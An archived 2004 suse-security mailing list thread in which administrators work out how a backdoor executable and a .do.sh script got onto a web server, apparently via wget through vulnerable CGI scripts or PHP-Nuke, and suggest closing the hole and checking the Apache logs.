[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

RE: [suse-security] Backdoor over http(s)??



There seem to be a number of security problems with phpnuke - Nessus 2.0.8a lists 8 or more tests for various problems; http://www.phpnuke.org/ says that the latest version is 7.0 and fixes several security problems including SQL injection bugs. I couldn't see 6.9 listed as a release but the site doesn't appear to have much useful information on it - most things highlight security fixes as a matter of urgency, this one seems to use <FONT SIZE=-1> for the security fixes that are listed!

I've downloaded the rs.c from the web site and it does compile but it generates a 6.5KB executable not the 450KB executable that you have. I don't think rs.c is either all of the code or it's a different program or possibly a much much earlier incarnation of it.

I would think that your Apache logs might tell you more about who executed what and when just prior to the time when the executable appeared on your system.

-----Original Message-----
From: Mátyás Tibor [mailto:templar@xxxxxxxxxxxxxx]
Sent: 13 January 2004 16:33
To: Rick Green
Cc: suse-security@xxxxxxxx
Subject: Re: [suse-security] Backdoor over http(s)??


I have got in /cgi-bin/ directory:

-neomail (1.26)
-openwebmail (2.30)
-SuSE things
-sanecgi

but nothing else.

And I have Phpnuke 6.9 (?? PHP ??)
-----
Ok, somebody could use wget, but what about the .do.sh -->
how was it possible, to execute it?


Tibor

On Tue, 13 Jan 2004 10:33:27 -0500 (EST), Rick Green wrote
> Before you get too involved in analysing the content of the file 
> that was imported to your machine, you may want to close the 
> facility that allowed the download in the first place!  What have 
> you got in your cgi-bin directory that allows arbitrary use of wget?
> 
> -- 
> Rick Green
> 
> "They that can give up essential liberty to obtain a little
>  temporary safety, deserve neither liberty nor safety."
>                                   -Benjamin Franklin




-- 
Check the headers for your unsubscription address
For additional commands, e-mail: suse-security-help@xxxxxxxx
Security-related bug reports go to security@xxxxxxx, not here


--
Check the headers for your unsubscription address
For additional commands, e-mail: suse-security-help@xxxxxxxx
Security-related bug reports go to security@xxxxxxx, not here